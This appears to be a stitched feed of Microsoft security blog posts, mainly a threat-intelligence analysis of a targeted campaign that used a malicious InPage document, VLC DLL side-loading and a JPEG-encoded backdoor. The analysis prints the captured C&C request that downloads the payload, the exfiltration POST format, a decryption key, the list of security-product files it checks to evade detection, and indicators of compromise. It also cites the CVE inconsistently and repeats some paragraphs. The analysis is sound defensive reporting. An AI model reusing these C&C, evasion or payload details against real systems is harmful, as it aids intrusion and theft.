Solution: Use Windows 10s security features designed to both stop the initial infection and, if infected, prevent further lateral movement.

Domain dominance: The attacker will try to elevate their access within the network to gain access to a privileged account and your company data.

Solution: Use Microsoft Advanced Threat Analytics to provide a robust set of capabilities to detect this stage of an attack.

Data consolidation and exfiltration: If an attacker gains access to your data, the final step would be to package it up and move it out of the organization without detection, in a process called “data consolidation and exfiltration.” Paying close attention to the first phases of an attack will hopefully prevent an attacker from getting this far.

Focus on what matters most to the business

Even the largest enterprise is faced with tough choices when allocating security resources. If you are smart about how you appropriate them, you can make choices that have the greatest chance of protecting your organization. It starts with understanding your current state, both your resources and the most critical business drivers, formulating a solid strategy, implementing good cybersecurity maintenance, and finally, disrupting the cybersecurity kill chain.

In the coming weeks, I will share lessons Ive learned to evaluate risks quantitatively. And following this, I will talk about how Ive learned to influence others to take their role in protecting the organization very seriously.

To read more blogs from the series, visit the CISO series page.

The post CISO series: Lessons learned—4 priorities to achieve the largest security improvements appeared first on Microsoft Secure.

Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates.
More information about this month’s security updates can be found on the Security Update Guide.

2019/2/14 更新: (お知らせ) Microsoft Dynamics 365 の脆弱性 CVE-2018-8654 の詳細ページを公開しました。脆弱性に対応するための更新プログラム

Today, we released security updates to provide additional protections against malicious attackers. As a best practice, we encourage customers to turn on automatic updates.
More information about this month’s security updates can be found on the Security Update Guide.

Every day, the Microsoft Security Response Center (MSRC) receives vulnerability reports from security researchers, technology/industry partners, and customers. We want those reports, because they help us make our products and services more secure. High-quality reports that include proof of concept, details of an attack or demonstration of a vulnerability, and a detailed writeup of the issue are extremely helpful and actionable.

Every day, the Microsoft Security Response Center (MSRC) receives vulnerability reports from security researchers, technology/industry partners, and customers. We want those reports, because they help us make our products and services more secure. High-quality reports that include proof of concept, details of an attack or demonstration of a vulnerability, and a detailed writeup of the issue are extremely helpful and actionable.

Our analysis of a targeted attack that used a language-specific word processor shows why its important to understand and protect against small-scale and localized attacks as well as broad-scale malware campaigns. The attack exploited a vulnerability in InPage, a word processor software for specific languages like Urdu, Persian, Pashto, and Arabic.

More than 75% of the targets were located in Pakistan; however, the attack also found its way into some countries in Europe and the US. The targets included government institutions.

Figure 1. Geographic distribution of targets

In the past, researchers at Palo Alto and Kaspersky have blogged about attacks that use malicious InPage documents. Beyond that, public research of these types of attacks has been limited.

The Office 365 Research and Response team discovered this type of targeted attack in June. The attack was orchestrated using the following approach:

• Spear-phishing email with a malicious InPage document with the file name hafeez saeed speech on 22nd April.inp was sent to the intended victims
• The malicious document, which contained exploit code for CVE-2017-12824, a buffer-overflow vulnerability in InPage reader, dropped a legitimate but outdated version of VLC media player that is vulnerable to DLL hijacking
• The side-loaded malicious DLL called back to a command-and-control (C&C) site, which triggered the download and execution of the final malware encoded in a JPEG file format
• The final malware allowed attackers to remotely execute arbitrary command on the compromised machine

Figure 2. Attack infection chain

Office 365 Advanced Threat Protection (ATP) protects customers from this attack by detecting the malicious InPage attachment in spear-phishing emails used in the campaign. Office 365 ATP inspects email attachments and links for malicious content and provides real-time protection against attacks.

Office 365 ATP leverages massive threat intelligence from different data sources and integrates signals from multiple services such as Windows Defender ATP and Azure ATP. For example, Windows Defender Antivirus detects the malicious files and documents used in this attack. Additionally, endpoint detection and response (EDR) capabilities in Windows Defender ATP detects the DLL side-loading and malicious behavior observed in this attack. Through the integration of Office 365 ATP and the rest of Microsoft security technologies in Microsoft Threat Protection, detection and remediation are orchestrated across our solutions.

Entry point: Malicious InPage document

An email with a malicious InPage lure document attached was sent to select targets. The document exploits CVE-2017-12842, a vulnerability in InPage that allows arbitrary code execution. When the malicious InPage document is opened, it executes a shellcode that decrypts and executes an embedded malicious DLL file. The decryption routine is a simple XOR function that uses the decryption key “27729984h”.

Figure 3. First DLL decryption function

Stage 1: DLL side-loading and C&C communication

The decrypted malicious DLL contains two files embedded in the PE resources section. The first resource file is named 200, which is a legitimate version of VLC media player (Product Version: 2.2.1.0, File Version: 2.2.1). The second file in the resources section is named 400, which is a DLL hijacker that impersonates the legitimate file Libvlc.dll.

When run, the stage 1 malware drops both the VLC media player executable and the malicious Libvlc.dll in %TEMP% folder, and then runs the VLC media player process.

The vulnerable VLC media player process searches for the dropped file Libvlc.dll in the directory from which it was loaded. It subsequently picks up and loads the malicious DLL and executes its malicious function.

Figure 4. Functions exported by the malicious Libvlc.dllFigure 5. Functions imported from Libvlc.dll by the VLC media player process

The most interesting malicious code in Libvlc.dll is in the function libvlc_wait(). The malicious code dynamically resolves the API calls to connect to the attacker C&C server and download a JPEG file. If the C&C server is not reachable, the malware calls the API sleep() for five seconds and attempts to call back the attacker domain again.

Figure 6. C&C callback in malicious function libvlc_wait()

If the JPEG file, logo.jpg, is successfully downloaded, the malicious code in libvlc_wait() skips the first 20 bytes of the JPEG file and creates a thread to execute the embedded payload. The code in JPEG file is encoded using Shikata ga nai, a custom polymorphic shellcode encoder/decoder.

Below an example of HTTP request sent to the C&C to download the malicious file logo.jpg.

GET /assets/vnc/logo.jpg HTTP/1.1
Accept: */*
Host: useraccount.co

HTTP/1.1 200 OK
Date: Mon, 09 Jul 2018 13:45:49 GMT
Server: Apache/2.4.33 (cPanel) OpenSSL/1.0.2o mod_bwlimited/1.4 Phusion_Passenger/5.1.12
Upgrade: h2,h2c
Connection: Upgrade
Last-Modified: Mon, 09 Apr 2018 07:19:20 GMT
ETag: "26e0378-2086b-56965397b5c31"
Accept-Ranges: bytes
Content-Length: 133227
Content-Type: image/jpeg

Figure 7. HTTP GET Request embedded in the JPEG File

The historical Whois record indicated that the C&C server was registered on March 20, 2018.

Domain Name: useraccount.co
Registry Domain ID: D2169366F46A14BCD9EB42AF48BEA813C-NSR
Registrar WHOIS Server:
Registrar URL: whois.publicdomainregistry.com
Updated Date: 2018-03-20T14:04:40Z
Creation Date: 2018-03-20T14:04:40Z
Registry Expiry Date: 2019-03-20T14:04:40Z
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod

Figure 8. Whois record for the attacker C&C server.

The shellcode in the JPEG file uses multiple layers of polymorphic XOR routines to decrypt the final payload. After successfully decrypting the payload, it drops and executes the final DLL malware aflup64.dll in the folder %ProgramData%\Dell64.

Figure 9. The first 29 Bytes of the JPEG file after the header make up the first decryption layer

Figure 10. Valid JPEG file header followed by encrypted malicious code

Stage 2: System reconnaissance and executing attacker commands

The final stage malware maintains persistence using different methods. For example, the malicious function IntRun() can load and execute the malware DLL. It also uses the registry key CurrentVersion\Run to maintain persistence.

The malwares capabilities include:

• System reconnaissance

  • List computer names, Windows version, Machine ID, running processes, and loaded modules
  • List system files and directories
  • List network configuration

• Execute attacker commands
• Evade certain sandboxes or antivirus products

Collected information or responses to commands are sent back to the attacker domain via an HTTP post request. The request has a custom header that always starts with 37 hardcoded alphanumeric characters.

---------------------n9mc4jh3ft7327hfg78kb41b861ft18bhfb91
Content-Disposition: form-data; name="id";
Content-Type: text/plain
<Base64 Data Blob>

Figure 11. Sample of malware POST request

The malware also has a list of hardcoded file names of security products and sandbox solutions. If these files are present in a machine the malware attempts to infect, it exists:

• avgnt.exe
• avp.exe
• egui.exe
• Sbie.dll
• VxKernelSvcNT.log

Detecting targeted attacks with Office 365 ATP and Windows Defender ATP

Historically, malware payloads like the stage 2 malware in this attack are used to steal credentials and other sensitive information, install more payloads, or move laterally in the network. However, because the malware opens a backdoor channel for remote attackers to execute arbitrary commands of their choice, theres a wide range of possibilities.

Enterprises can protect themselves from targeted attacks using Office 365 Advanced Threat Protection, which blocks threats based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging sandboxing and time-of-click protection. Recent enhancements in anti-phishing capabilities in Office 365 address impersonation, spoof, phishing content, and internal phishing emails sent from compromised accounts. If you are not already secured against advanced cyberthreat campaigns via email, begin a free Office 365 E5 trial today.

In addition, enterprises can use Windows Defender Advanced Threat Protection, which provides a unified endpoint security platform for intelligent protection, detection, investigation, and response. Exploit protection, attack surface reduction rules, hardware-based isolation, controlled folder access, and network protection reduce the attack surface. Windows Defender Antivirus detects and blocks the malicious documents and files used in this campaign. Windows Defender ATPs endpoint detection and response, automated investigation and remediation, and advanced hunting capabilities empower security operations personnel to detect and stop attacks in enterprise networks. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free Windows Defender ATP trial.

These two services integrate with the rest of Microsofts security technologies as part of the Microsoft Threat Protection, an integrated solution providing security for the modern workplace across identities, endpoints, user data, cloud apps, and infrastructure. Cybersecurity is the central challenge of our digital age, and Microsoft doesnt stop innovating to provide industry-best integrated security. For more information, read the blog post Delivering security innovation that puts Microsofts experience to work for you.

 

 

 

Ahmed Shosha and Abhijeet Hatekar
Microsoft Threat Intelligence Center

 

 

 

Indictors of Compromise (IoCs)

URLs
hxxp://useraccount[.]co/assets/vnc/logo[.]jpg
hxxp://useraccount[.]co/assets/vnc/rest[.]php
hxxp://useraccount[.]co/assets/kvx/success[.]txt
hxxp://useraccount[.]co/assets/pqs/rest[.]php

Files (SHA-256)
013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852 (INP File)
9ffb61f1360595fc707053620f3751cb76c83e67835a915ccd3cbff13cf97bed (EXE)
019b8a0d3f9c9c07103f82599294688b927fbbbdec7f55d853106e52cf492c2b (DLL)

The post Attack uses malicious InPage document and outdated VLC media player to give attackers backdoor access to targets appeared first on Microsoft Secure.

As an executive security advisor at Microsoft and a former CISO, I meet with other CISOs every week to discuss cybersecurity, cloud architecture, and sometimes everything under the sun regarding technology. During these discussions with CISOs and other senior security executives of large enterpriseswho are in the beginning stages of a cloud migrationI find theyre excited about the increased flexibility of Microsoft Azure services and the consumption-based model it offers their business units. Regardless of where they are in the journey, they also have some concerns. For example, they need to figure out how to enforce security policies when IT no longer serves as the hub for services and applications.

Specifically, they come to me with the following three questions:

1. We are interested in Microsoft and already have many of your security solutions. How do these tools translate to a hybrid-cloud solution and where do we start?
2. Security impacts many parts of the organization outside of the security team. Who do we need to bring to the table across the organization for this to be a successful migration to a secure cloud?
3. Can we create a roadmap or strategy to guide our journey to the cloud?

It really comes down to balancing agility with governance. Many of my customers have found that the Azure enterprise scaffold and Azure Blueprints (now in preview) can help them balance these two critical priorities. I hope my suggestions and insight help you to understand how to use these tools to smooth your cloud migration.

Establish a flexible hierarchy as the baseline for governance

Scaffolding and blueprints are concepts borrowed from the construction industry. When a construction crew builds a large, complex, and time-consuming project they refer to blueprints and erect scaffolding. Together these tools simplify the process and provide guardrails to guide the builder. You can think of the Azure enterprise scaffold and Azure Blueprints in the same way.

• Scaffolding is a flexible framework that applies structure and anchors for services and workloads built on Azure. It is a layered process designed to ensure workloads meet the minimum governance requirements of your organization while enabling business groups and developers to quickly meet their own goals.
• Blueprints are common cloud architecture examples that you can customize for your needs.

Customers find the Azure enterprise scaffold valuable because it can be personalized to the needs of the company for billing, resource management, and resource access. It is grounded in a hierarchy that gives you a structure for subdividing the environment into up to four nested layers to match your organization’s structure:

Enterprise enrollmentThe biggest unit of the hierarchy. Enterprise enrollment defines the specifics of your contracted cloud services.

DepartmentsWithin the enterprise agreement are departments, which can be broken down according to what works best for your organization. Three of the most popular patterns are by function (human resources, information technology, marketing), by business unit (auto, aerospace), and by geography (North America, Europe).

SubscriptionsWithin departments are accounts and then subscriptions. Subscriptions can represent an application, the lifecycle of a service (such as production and non-production), or the departments in your organization.

Resource groupsNested in subscriptions are resource groups, which allow you to put resources into meaningful groups for management, billing, or natural affinity. This hierarchy serves as the foundation for security policies and processes that you will layer on next.

Safeguard your identities and privileged access

When I talk with security executives about implementing security policies, we always start our discussion with identity. You can do the same by identifying who and what systems should have access to what resourcesand how you want to control this access. Once you connect your Azure Active Directory (Azure AD) to your on-premises Active Directory (AD)using the AD Connect toolyou can use role-based access control (RBAC) to assign users to roles, such as owner, contributor, or others that you create. Dont forget to set up Multi-Factor Authentication (MFA) and adhere to the principle of granting the least privilege required to do the work. See Azure identity management best practices for more resources and security tips.

With your hierarchy established and resources assigned, you can use Azure Policy and Initiatives to define policies and apply them to subscriptions.

A couple examples of popular policies include:

• Restrict specific resources to a geographical region to comply with country or region-specific regulations.
• Prohibit certain resources, such as servers or data, from being deployed publicly.

Policies are a powerful tool that let you give business units access to the resources they need without exposing the enterprise to additional risk.

You will also need a plan for securing privileged accounts. I recommend creating a privileged access workstation when you start building out your security forest for administrators. Privileged access workstations provide a dedicated operating system for sensitive tasks that separates them from daily workstations and provide additional protection from phishing attacks and other vulnerabilities. With a good identity and access policy in place you have started down the path of trust but verify or building a zero-trust environment.

Gain greater visibility into the security of your entire environment

One big advantage of moving to the cloud is how much more visibility you get into the security of your environment versus on-premises. Azure offers several additional capabilities that allow you to protect your resources and detect threats. TheAzure Security Centerprovides a unified view of the security status of resources across your environment. It includes advanced threat protection that uses artificial intelligence (AI) to detect incoming attacks and sends alerts in a way thats easy to digest. Security DevOps toolkits are a collection of scripts, tools, and automations that allow you to integrate security into native DevOps workflows. Azure update management ensures all your servers are patched with the latest updates.

Get started with Azure Blueprints

Using the scaffolding and blueprints framework can help you establish a secure foundation for your Azure environment by safeguarding identities, resources, networks, and data. Ive touched on a few of the components, and you can dig into the nitty gritty in this article. When youre ready to get started, Azure Blueprintsare available in preview. This capability will allow you to deploy the Azure enterprise scaffold model to your organization. Numerous organizations have used the blueprints and followed the scaffolding approach to successfully roll out their cloud strategy securely and faster than they expected.

As a final note of consideration as you work through your organizations cloud/security strategymake sure you have all the stakeholders in the room. Many times, there are other parts of the organization who own security controls but are outside of the security organization. These might include operations, legal, human resources, information technology, and others. These stakeholders should be brought into the scaffolding and blueprint discussions, so they understand their roles and responsibilities as well as provide input.

If you want to discuss this further or need assistance, please reach out to your Microsoft account team.

The post CISO series: Build in security from the ground up with Azure enterprise appeared first on Microsoft Secure.